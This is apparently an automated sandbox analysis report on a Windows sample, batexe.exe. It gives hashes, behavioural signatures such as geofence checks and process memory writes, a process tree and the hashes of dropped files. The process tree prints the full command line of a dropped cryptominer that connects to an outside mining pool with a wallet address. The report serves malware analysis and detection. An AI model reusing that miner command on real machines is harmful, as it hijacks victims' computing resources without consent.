Analysis
-
max time kernel
300s -
max time network
306s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
18/02/2024, 12:55
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 1476 b2e.exe 984 cpuminer-sse2.exe -
Loads dropped DLL 6 IoCs
pid Process 984 cpuminer-sse2.exe 984 cpuminer-sse2.exe 984 cpuminer-sse2.exe 984 cpuminer-sse2.exe 984 cpuminer-sse2.exe 984 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/2940-2-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2940 wrote to memory of 1476 2940 batexe.exe 84 PID 2940 wrote to memory of 1476 2940 batexe.exe 84 PID 2940 wrote to memory of 1476 2940 batexe.exe 84 PID 1476 wrote to memory of 4124 1476 b2e.exe 85 PID 1476 wrote to memory of 4124 1476 b2e.exe 85 PID 1476 wrote to memory of 4124 1476 b2e.exe 85 PID 4124 wrote to memory of 984 4124 cmd.exe 90 PID 4124 wrote to memory of 984 4124 cmd.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Users\Admin\AppData\Local\Temp\8538.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\8538.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8538.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CCF0.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4124 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:984
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10.9MB
MD535f84120cf0cbecf9c380ebad80a1643
SHA14876a100020a775763d17347dfba6c503b3800c6
SHA256299989f99e92e439bd85aea4d7f2e8c81e7b5f451ee3cc8fae5bbf6849d5538f
SHA512720b813b9d5322a51bb6213fe586f16b31146936937647810d7640e20ebfb2d0d281b6d865a785a51504f467b984c775aa6722dc4db9777fc31333c60d934501
-
Filesize
2.9MB
MD5827f1bf06ddab89a4c149b43a83dc6fe
SHA1db87148fa9515ea974520181663c9269336cc5c7
SHA2560408e82d3c5295fba0aa6c6e88caffddd6071555e6b418c163448dd39463cabb
SHA5123388f3d8a503020d31df3e7c2833ef5a9978eed0484c410aec757e209b086ac56a25aeb2f52fb35f1ed2b2f28c6c8dd72325b22056f281e758f74861ffb77868
-
Filesize
3.1MB
MD5a4d403168d42fd2861c79150633c8e3e
SHA186071353b0ffc34f4d840cffe4fa1c6f6c3bd1c1
SHA256d684751ce3b1d4e446c232035e9e187d67c9d26a8094f7f45e71287468848cb8
SHA5123f6041ad4626242d829e51de11a639893e7e4dc16d1ac3a68fad3a1eb57f11faeb4342a1faee1e7136bab0e9099a6be975ecc25ab58d51e30a3271fe025403bf
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.8MB
MD5f67f646804a0965660f76cbe61bbdb7d
SHA132cb4245f872ce6c036ce2ab08cc3209122e6654
SHA256c2730d2d1d3c8b496ce00b91bf7a319d48e987aef8f7a1fca85e8c8b328f487a
SHA512633ba4fc5f0918b2674f48ef40eadc74c60e6fd6900a1920ffabcee30cba8331993b9a5a1a52309295f41cfd792bca7ef72be703b5f726eeccdf6e0c4574d9ef
-
Filesize
2.0MB
MD53442455c1def06dceb5b0530f09c1a59
SHA183fdff8dfa03799d788493b4181c86251a33d417
SHA256aa6bafb5ef95ba2a49078ffb1c11012f806aff2e9eb2e5cbd15abce53464ae3c
SHA5127a3624834dddbbeba5d45ddf287e727b0f5d44ecaaf1b804575fe696f53a4939862ba49010352de1043b2a2def2898e563be9bc9b481121ceca5ec4bb3f4d0c0
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
1.7MB
MD50e5f1f8489881871a92df1a497682fa5
SHA12acb11e02720d8e084affdaef4d2b65ba3ab21be
SHA25624670f2eb9726222476b2238a986eb4b46a8f6c0315e7a2e2b3cd386d12e7847
SHA512ba9bc03501d8b0cabf3d9b1b23657198ebb4c77b2d42e05ae512f2ca4747404be270bfd57a8ab00195953c4c7a353b08e0eeae33129e7264f88a2a98d0665a4a
-
Filesize
1.7MB
MD5911fcf809bc6f117ed0920149f8acb61
SHA1e106a72067a03b37868fc4d965f73a38058132b0
SHA256a4db85381101cf760db8ccd335b2edb2bf7f1243662b991eb644047e51a04ef5
SHA512eb063df34b3d22cf9399bc94b6cf57cc80111518f8841330504831fec5b3d0a9730cfa63caa039a9bea72fd022efbdeea794180d44c1324ac2457d7250b4dab0
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770